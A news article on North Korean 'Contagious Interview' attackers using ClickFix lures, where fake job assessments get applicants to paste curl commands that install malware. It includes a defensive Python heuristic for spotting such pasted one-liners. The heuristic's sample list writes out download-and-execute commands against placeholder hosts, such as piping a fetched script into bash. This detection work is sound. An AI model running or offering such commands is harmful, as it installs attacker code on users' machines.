North Korean Hackers Target Job Seekers With ClickFix Attacks



North Korean hackers behind the “Contagious Interview” campaign are using the ClickFix social engineering tactic to target job seekers with phony employment offers, according to researchers at SentinelOne.

“ClickFix typically proceeds as follows,” the researchers explain. “A targeted job seeker receives an invitation to participate in a job application process, directing them to a lure website where they are prompted to complete a skill assessment.

“During the assessment, the applicant encounters a fabricated error message, such as a camera access issue. They are then instructed to copy and paste command lines, often involving utilities like curl, to download and execute a supposed update from a separate malware distribution server, unknowingly deploying malware in the process.”
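The copy-and-paste step described above is something defenders can look for in shell history or process command-line telemetry. The following heuristic is an added example, not code from SentinelOne or this article: it flags POSIX-style one-liners that fetch with curl or wget and then run the result. The function names, sample commands and `example.invalid` hosts are constructed for illustration, and combined short flags such as `-fsSLo` are assumed out of scope.

```python
import re
import shlex

DOWNLOADERS = {"curl": ("-o", "--output"), "wget": ("-O", "--output-document")}
INTERPRETERS = {"sh", "bash", "zsh", "python", "python3"}

def _name(path):
    """Base name of a program or file path ('./x' and '/tmp/x' both give 'x')."""
    return path.rsplit("/", 1)[-1]

def findings(cmdline):
    """Return the reasons a pasted one-liner looks like download-and-execute."""
    reasons, saved, after_download, op = [], set(), False, None
    for part in re.split(r"(\|\||&&|\||;)", cmdline):
        if part in ("|", "||", "&&", ";"):
            op = part
            continue
        try:
            tokens = shlex.split(part)
        except ValueError:  # unbalanced quotes: fall back to a naive split
            tokens = part.split()
        if tokens and tokens[0] == "sudo":
            tokens = tokens[1:]
        if not tokens:
            continue
        prog = _name(tokens[0])
        if prog in DOWNLOADERS:
            # Remember where the download is written so later steps can be matched.
            for flag, value in zip(tokens, tokens[1:]):
                if flag in DOWNLOADERS[prog]:
                    saved.add(_name(value))
            after_download = True
            continue
        if op == "|" and after_download and prog in INTERPRETERS:
            reasons.append("download piped into " + prog)
        # An interpreter runs its arguments; anything else runs itself.
        targets = tokens[1:] if prog in INTERPRETERS else tokens[:1]
        hit = next((t for t in targets if _name(t) in saved), None)
        if hit:
            reasons.append("downloaded file executed: " + hit)
        after_download = False
    return reasons

# Constructed sample commands; the hosts are placeholders, not indicators.
SAMPLES = [
    "curl -s https://updates.example.invalid/camera-fix.sh | bash",
    "curl -o /tmp/driver.sh https://updates.example.invalid/d && chmod +x /tmp/driver.sh && /tmp/driver.sh",
    "curl -sS https://api.example.invalid/health | grep ok",
]
RESULTS = {cmd: findings(cmd) for cmd in SAMPLES}
```

The first two samples are flagged and the third, an ordinary health check piped to `grep`, is not.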

The attackers are primarily targeting marketing and finance employees at cryptocurrency companies, using “lures involving various job positions, such as Portfolio Manager, Investment Manager, and Senior Product Manager, across a range of impersonated companies including Archblock, Robinhood, and eToro.”

The attackers frequently rotate their infrastructure to stay ahead of defenders, setting up new domains to avoid detection.

“Given the continuous success of the campaign in engaging job applicants, the threat actors may be prioritizing maintaining operational readiness and meeting their objectives by rapidly deploying new assets to replace disrupted infrastructure, rather than undertaking large-scale targeted changes,” the researchers write. “We observed a high rate of new infrastructure deployment by the Contagious Interview threat actors alongside losses of existing infrastructure due to actions by service providers, which supports this assessment.”

The researchers conclude, “[A] critical element in mitigating this threat is the human factor. It is important that job seekers, particularly those within the cryptocurrency sector, exercise heightened vigilance when engaging with employment offers and associated assessments.”


SentinelOne has the story.




